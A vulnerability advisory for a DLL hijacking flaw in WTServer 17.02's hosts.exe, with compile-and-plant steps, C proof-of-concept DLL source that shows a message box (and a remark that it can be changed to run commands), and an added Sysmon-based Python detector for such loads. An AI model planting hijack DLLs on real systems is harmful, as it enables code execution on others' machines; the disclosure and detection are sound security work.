WTServer version 17.02 suffers from a DLL hijacking vulnerability.
[+] Title: WTServer-17.02 - DLL Loading Arbitrary Code Execution
[+] Credits / Discovery: Nassim Asrir
[+] Author Email: wassline@gmail.com
[+] Author Company: Henceforth
Vendor:
===============
http://wtserver.wtriple.com/
Download:
===========
https://sourceforge.net/projects/wtnmp/files/latest/download?source=directory
About Product:
===============
WTServer - Nginx MariaDB Redis Php development stack for Windows
A lightweight, fast and stable server stack for developing php mysql applications on windows, based on the excellent webserver Nginx. A lighter alternative to XAMPP and WAMP.
Package contains:
- Nginx 1.11.10 web server
- MariaDB 10.1.21 database server, mysql replacement (32/64bit)
- Redis 3.2 Cache/NoSql, memcached alternative (64bit)
- Php 5.6.30 & PHP 7.0.16 & PHP 7.1.2 scripting language (32/64bit)
- WinSCP SFTP client
- HTTPS using free LetsEncrypt certificates
- Composer dependency manager for php
- Adminer web based database manager
- Reg.php regular expressions tester
- WTServer Manager (32/64bit), formerly known as *wt-nmp*
Vulnerability Type:
===================
DLL Loading Arbitrary Code Execution.
Information:
===================
The vulnerable program in WTServer is "hosts.exe", and the vulnerable DLL is "api-ms-win-appmodel-runtime-l1-1-0.dll".
POC:
===================
Download the PoC from GitHub and compile it with "CodeBlocks" or "GCC".
https://gist.github.com/Nassim-Asrir/8f9a97919e84c4cddc491b317672172b
Data:
// Compile this code, rename the output to "api-ms-win-appmodel-runtime-l1-1-0.dll", copy it to "C:\WTServer\bin\HostsEditor", then launch "hosts.exe".
// For any information, contact me at: wassline@gmail.com
#include "main.h"
#include <windows.h>
#define DllExport __declspec (dllexport)

// Shows a message box to prove that the DLL was loaded.
int mes()
{
    MessageBox(0, "DLL Hijacking Vulnerable", "Nassim Asrir", MB_OK);
    return 0;
}

// Entry point called by the loader; runs mes() on every notification.
BOOL WINAPI DllMain (
    HANDLE hinstDLL,
    DWORD fdwReason,
    LPVOID lpvReserved)
{
    mes();
    return TRUE;
}
- Download the PoC, compile it, copy it to "C:\WTServer\bin\HostsEditor", then launch "hosts.exe"; the MessageBox appears. The code can also be modified to launch a system command (calc or ....).
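
Detection side of the behaviour described above, as an added example that is not part of the original advisory: a filter over Sysmon Event ID 7 (ImageLoad) records that flags a system-named DLL such as "api-ms-win-appmodel-runtime-l1-1-0.dll" loaded from outside the Windows directories without a valid signature. It generalises from the one DLL named here to any "api-ms-win-"/"ext-ms-" name; the sample events, the C:\Windows install path and the function names are assumptions constructed for illustration.

```python
import ntpath  # Windows path rules, so the check also runs on a non-Windows analysis host

# Constructed Sysmon Event ID 7 (ImageLoad) records, reduced to the fields used here.
SAMPLE_EVENTS = [
    {"Image": r"C:\WTServer\bin\HostsEditor\hosts.exe",
     "ImageLoaded": r"C:\Windows\System32\kernel32.dll",
     "Signed": "true", "SignatureStatus": "Valid"},
    {"Image": r"C:\WTServer\bin\HostsEditor\hosts.exe",
     "ImageLoaded": r"C:\WTServer\bin\HostsEditor\api-ms-win-appmodel-runtime-l1-1-0.dll",
     "Signed": "false", "SignatureStatus": "Unavailable"},
    {"Image": r"C:\Program Files\App\app.exe",  # app shipping signed runtime DLLs app-locally
     "ImageLoaded": r"C:\Program Files\App\api-ms-win-crt-runtime-l1-1-0.dll",
     "Signed": "true", "SignatureStatus": "Valid"},
    {"Image": r"C:\Tools\viewer.exe",
     "ImageLoaded": r"C:\Tools\plugin.dll",
     "Signed": "false", "SignatureStatus": "Unavailable"},
]

# Assumption: Windows is installed in C:\Windows on the monitored hosts.
SYSTEM_DIRS = (r"c:\windows\system32", r"c:\windows\syswow64", r"c:\windows\winsxs")
SYSTEM_NAME_PREFIXES = ("api-ms-win-", "ext-ms-")


def is_system_path(path):
    p = ntpath.normpath(path).lower()
    return any(p.startswith(d + "\\") for d in SYSTEM_DIRS)


def suspicious_loads(events):
    """Return loads of system-named DLLs from non-system paths without a valid signature."""
    hits = []
    for ev in events:
        loaded = ntpath.normpath(ev["ImageLoaded"])
        name = ntpath.basename(loaded).lower()
        if not name.startswith(SYSTEM_NAME_PREFIXES) or is_system_path(loaded):
            continue
        signed_ok = ev.get("Signed", "").lower() == "true" and ev.get("SignatureStatus") == "Valid"
        if signed_ok:
            continue  # e.g. vendor-signed redistributable copies
        same_dir = ntpath.dirname(loaded).lower() == ntpath.dirname(ev["Image"]).lower()
        hits.append({"process": ntpath.basename(ev["Image"]), "module": name,
                     "path": loaded, "beside_executable": same_dir})
    return hits


if __name__ == "__main__":
    for hit in suspicious_loads(SAMPLE_EVENTS):
        print(hit)
```

Only the second sample record is reported; the signed app-local runtime copy and the ordinary unsigned plugin are left alone, which keeps the rule narrow enough to alert on.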
CVE Reference:
===============
N/A
Tested on:
===============
Windows 7
Windows XP